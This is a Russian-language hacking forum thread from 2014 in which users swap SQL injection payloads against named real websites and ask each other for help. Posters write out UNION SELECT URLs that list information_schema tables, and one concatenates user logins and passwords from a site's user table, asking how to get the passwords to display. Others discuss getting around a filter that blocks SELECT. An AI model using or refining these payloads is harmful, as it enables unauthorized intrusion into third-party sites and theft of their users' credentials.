07.08.2014, 21:32
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Shade
а вот еще вопросик. Чего он не показывает мне таблички?
Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше
Код:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12+from+information_shema.tables+--+
Найди отличия
Сообщение от None
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_schema.tables+--
|
|
|
07.08.2014, 21:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Ravenous
Найди отличия
о мой бог) я безграммотный чудила.. благодарю
|
|
|
|
09.08.2014, 00:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)
Код:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=) |
|
|
|
09.08.2014, 00:36
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Shade
Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)
Код:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=) Тут и подавно не пахнет никакой инъекцией.
И вообще это Drupal) Можешь проходить мимо)
|
|
|
|
10.08.2014, 18:44
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.babyplan.ru/index.php?app=forums&module=post§ion=post&do=r eply_post&t=31212&f=7
Мысли-идеи ? =)
|
|
|
|
10.08.2014, 19:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Cennarios
http://www.babyplan.ru/index.php?app=forums&module=post§ion=post&do=r eply_post&t=31212&f=7
Мысли-идеи ? =)
Вот тут-то точно по учебнику. Слепая, временнАя и union в двадцать колонок без вывода(?). Впрочем, если сделать регу, то, возможно, вывод таки будет.
403 при выполненном запросе, 500 при ошибочном.
|
|
|
|
10.08.2014, 19:27
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
|
|
|
|
10.08.2014, 21:11
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Cennarios
Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
А вы не думали, что information_schema просто недоступна для этого юзера, не?
|
|
|
|
11.08.2014, 01:01
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от madhatter
А вы не думали, что information_schema просто недоступна для этого юзера, не?
Не будьте голословны, аргументируйте свое утверждение по поводу кодов ошибки рабочими примерами реквестов
Дело в том что запос падает на любом вхождении SELECT, наверняка как-то можно обойти
|
|
|
|
11.08.2014, 11:55
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
начал раскручивать скулю.. и столкнулся с такой проблемой
нашел 3 интерисующих меня стобца:
usr_login
usr_name
usr_pass
При запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3,4,5,6,7,8,9,10+from+user+--+
Ничего не выводит.
А при запросе:
Код:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3,4,5,6,7,8,9,10+from+user+--+
Выводит имя и логин пользователей(включая админа).
Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
